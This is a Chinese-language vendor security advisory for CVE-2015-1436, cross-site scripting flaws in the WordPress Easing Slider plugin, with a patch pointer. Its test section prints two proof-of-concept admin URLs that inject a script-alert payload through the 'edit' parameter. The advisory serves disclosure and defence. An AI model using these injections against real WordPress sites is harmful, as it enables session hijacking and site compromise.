当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

WordPress Easing Slider插件多个跨站脚本漏洞(CVE-2015-1436)

     发表日期:2015-02-26 10:20:22

WordPress Easing Slider插件多个跨站脚本漏洞(CVE-2015-1436)
BugTraq-ID:72572
CVE-ID:CVE-2015-1436
发布日期:2015-02-11
更新日期:2015-02-12
受影响系统:
WordPress Easing Slider
详细信息:

Easing Slider是简单易用的滑块插件。

Easing Slider 2.2.0.6及其他版本在实现上存在多个跨站脚本漏洞,攻击者可利用这些漏洞在受影响应用上下文中执行任意代码。


来源:
High-Tech Bridge SA (http://www.htbridge.ch/)
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/wp-admin/admin.php?page=easingslider_manage_customizations&edit=%2 2%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E

http://www.example.com/wp-admin/admin.php?page=easingslider_edit_sliders&edit=%27%22%3E%3 Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E
解决办法:
厂商补丁:

WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://wordpress.org/plugins/easing-slider/